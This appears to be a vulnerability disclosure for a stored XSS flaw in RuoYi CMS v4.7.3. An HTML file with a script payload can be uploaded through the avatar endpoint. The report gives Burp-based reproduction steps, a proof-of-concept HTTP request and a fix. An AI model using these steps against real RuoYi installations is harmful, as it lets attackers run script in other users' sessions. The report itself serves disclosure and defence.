Description
Vulnerability disclosure
Vulnerability title: The html file can be uploaded where the avatar is uploaded, and its content not be filtered, which resulting in stored XSS in Ruoyi cms
Product: https://github.com/yangzongzhuan/RuoYi
Affected Versions: v4.7.3(the lastest vesion)
Discovery time: 2022.5.16
Found by: solarpeng502
Exploit sence: The System allows multiple users to log in. If a user is granted user management rights, he can insert a malicious xss payload on user management page, so that all users with this permission can access and trigger an xss attack
Analysis report:
-
If you are not Chinese,please change the language into the English through Browser translation plugin such as Google.
-
Click the "modify avatar",and upload a normal image,the click OK button


-
Intercept the request package with a packet capture tool such as burp, change the file suffix to html, and change the content with xss payload such as "<script>alert(1)</script>,then pass the request,and the response shows "{"msg":"操作成功","code":0}",which means upload success



-
Refresh the index page,start burp,and then click the avatar again,the burp will intercept the xss html that we upload


-
Copy the html url,and then send to the other users using Ruoyi cms,if they click,the xss attack is triggered

POC:
POST /system/user/profile/updateAvatar HTTP/1.1
Host: mysite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21781164112778176297556867959
Content-Length: 249
Origin: http://mysite.com/
Connection: close
Referer: http://mysite.com/system/user/profile/avatar
Cookie: Your cookies
-----------------------------21781164112778176297556867959
Content-Disposition: form-data; name="avatarfile"; filename="blob.html"
Content-Type: image/png
-----------------------------21781164112778176297556867959--
Fixes: The backend should verify the file suffix, and do not allow html file upload;or check the content in Html file that filter xss payloads.

